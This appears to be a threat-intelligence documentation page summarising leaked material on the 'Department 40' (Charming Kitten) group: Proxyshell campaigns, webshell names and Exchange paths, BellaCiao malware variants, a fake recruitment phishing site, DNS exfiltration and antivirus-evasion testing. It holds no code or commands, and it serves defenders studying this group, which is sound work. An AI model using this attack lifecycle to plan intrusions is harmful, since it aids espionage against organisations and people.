Documentation Index
Fetch the complete documentation index at: https://mintlify.com/KittenBusters/CharmingKitten/llms.txt
Use this file to discover all available pages before exploring further.
Exploitation Tactics
Proxyshell Exploitation
Department 40 conducted extensive Proxyshell exploitation campaigns targeting Microsoft Exchange servers worldwide.Campaign Scale
Documented targeting across multiple countries:- India: 52+ targets exploited
- Greece: 34+ Exchange servers compromised
- Belgium: 31+ targets attacked
- Canada: Multiple targets identified
- Egypt: Various entities compromised
Exploitation Process
- Target Identification: Scanning for vulnerable Exchange servers
- Vulnerability Exploitation: Using CVE-2024-1709 and Proxyshell vulnerabilities
- Initial Access: Gaining authentication bypass
- Webshell Deployment: Installing persistent access mechanisms
- Credential Harvesting: Extracting user credentials and domain information
Target Selection
Proxyshell campaigns targeted:- Corporate email infrastructure
- Government Exchange servers
- Financial institution mail servers
- Professional services organizations
- Healthcare entities
Webshell Deployment
Multiple webshell variants employed:Webshell Types
-
ASP Webshells:
webshell.aspm0s.aspfile.asp- Custom variants for Exchange OWA paths
-
Deployment Locations:
/owa/auth/OutlookOU.aspx/owa/auth/webclient.aspx- Custom Exchange authentication paths
-
Capabilities:
- File upload and download
- Command execution
- Credential harvesting
- Network reconnaissance
Python Framework
Custom Python-based webshell management framework:- Command Interface: Python scripts for attacker-side command management
- Remote Execution: RCE capabilities (
rce5.py,RCE4.py) - Connection Management:
connect.pyfor session handling - Centralized Control: Framework for managing multiple compromised hosts
BellaCiao Malware
Department 40 developed and deployed the BellaCiao malware family, publicly analyzed by BitDefender.Variant 1: C# Webshell Dropper
Technical Details:- .NET-based dropper service
- Disguised as legitimate Windows services:
- “Exchange Agent Diagnostic Services”
- “Microsoft Monitoring Exchange Services”
- “Microsoft Agent Services”
- “WinUpdateService”
- Drops C# webshell on target systems
- File upload functionality
- File download capabilities
- Command execution interface
- Persistence through service installation
- Turkish Foreign Ministry attack documented
- Multiple webshell deployments
- Sustained access operations
Variant 2: PowerShell Reverse Proxy
Technical Details:- PowerShell-based implementation
- Uses Plink (PuTTY suite) for reverse proxy
- Customized PowerShell webserver based on publicly available code
- Reference: Modified version of
Start-Webserver.ps1from venom framework
iis.ps1: PowerShell webserver scriptiis.txt: Configuration and logs- Plink integration for tunneling
- Reverse proxy establishment
- Network tunneling
- Command and control communications
- Bypassing network restrictions
TAGHEB System
Internal documents reference the “TAGHEB system” for Windows infection and access:- Designed for Windows operating system targeting
- Access and persistence mechanisms
- Details contained in leaked operational documents
Social Engineering Operations
AMEEN ALKHALIJ Recruitment Campaign
Sophisticated social engineering operation targeting UAE security personnel.Campaign Design
Target Audience: Former government and security employees from the United Arab Emirates Operational Method:- Established fake recruitment website: ameen-alkhalij.nu
- Posed as legitimate employment opportunity
- Collected credentials and personal information
- Gathered intelligence on UAE security personnel
Infrastructure
Server Logs Available: Complete access logs from the ameen-alkhalij.nu server showing:- Visitor IP addresses
- Access timestamps
- User agent information
- Attack reconnaissance activities
Objectives
- Credential Harvesting: Collecting login credentials from targets
- Intelligence Gathering: Profiling former UAE security personnel
- Network Mapping: Identifying connections and relationships
- Operational Preparation: Building target database for future operations
Technical Capabilities
Credential Harvesting
Multiple methods employed:- Webshell Access: Extracting credentials from compromised systems
- Phishing Operations: Social engineering for credential collection
- Domain Enumeration: Active Directory user discovery
- Password Extraction: From memory and stored credentials
DNS Beaconing
Command and control communications via DNS:- Covert C2 channel establishment
- Data exfiltration through DNS queries
- Avoiding traditional network monitoring
- Maintaining persistent communications
Network Reconnaissance
Systematic intelligence gathering:- Active Directory enumeration
- Network mapping and topology discovery
- User and group identification
- Service and application discovery
- Credential and privilege mapping
Operational Security
Anti-Detection Measures
Documented testing against security products:-
Antivirus Testing: Malware tools tested against:
- Microsoft Defender
- Kaspersky
- Avira
- ESET
- Other major AV products
- Stealth Operations: Focus on avoiding detection during operations
Infrastructure Security
Procurement Methods:- Multiple procurement identities for server purchases
- Use of front companies
- Compartmentalized infrastructure
- Operational servers separated by function:
- Attack servers
- Tunnel servers
- File storage servers
- C2 infrastructure
- Documented credentials for server access
- Internal communication platforms (ISABELLE, 3CX, SIGNAL)
- File extraction systems
- Centralized infrastructure management
Attack Lifecycle
Initial Access
- Vulnerability Exploitation: Proxyshell, CVE-2024-1709, other CVEs
- Social Engineering: Phishing and fake recruitment sites
- Credential Compromise: Harvested credentials for initial entry
Persistence
- Webshell Deployment: Multiple ASP and custom webshells
- Service Installation: BellaCiao dropper services
- Backdoor Placement: Multiple access methods maintained
- Credential Collection: For future access
Privilege Escalation
- Domain Enumeration: Identifying privileged accounts
- Credential Harvesting: Administrator and service account credentials
- Lateral Movement Preparation: Mapping privilege paths
Collection and Exfiltration
- File Access: Via webshells and backdoors
- Email Access: Through compromised Exchange servers
- Credential Databases: User and system credentials
- Intelligence Gathering: Documents and communications
- DNS Exfiltration: Covert data extraction
Documented Attack Examples
Turkish Foreign Ministry
- Method: BellaCiao malware deployment
- Access: Sustained webshell access
- Duration: Extended operation documented
- Objective: Government intelligence collection
Mass Proxyshell Campaign
- Timeline: May-June 2022
- Scale: 200+ targets across multiple countries
- Method: Automated exploitation and webshell deployment
- Success Rate: Documented successful compromises in logs
UAE Security Personnel
- Operation: AMEEN ALKHALIJ social engineering
- Target: Former government and security employees
- Method: Fake recruitment website
- Duration: Extended campaign with detailed logging
Training and Development
Leaked documents reveal:- Training Programs: Internal training materials
- Technical Documentation: Espionage techniques and tools
- Malware Development: Source code and testing procedures
- Intelligence Reports: Analysis of Israeli entities and other targets
- Operational Guides: Including “The Group’s Phishing Guide”
Tools and Frameworks
Custom Malware
- BellaCiao (both variants with source code)
- CYCLOPS (referenced in public reporting)
- Custom webshells (ASP variants)
- Python command framework
- PowerShell scripts
Third-Party Tools
- Plink (PuTTY suite) for tunneling
- Modified open-source tools
- Standard penetration testing utilities
Infrastructure
- Comprehensive server inventory
- Attack infrastructure
- Tunnel servers
- Storage servers
- Internal communication platforms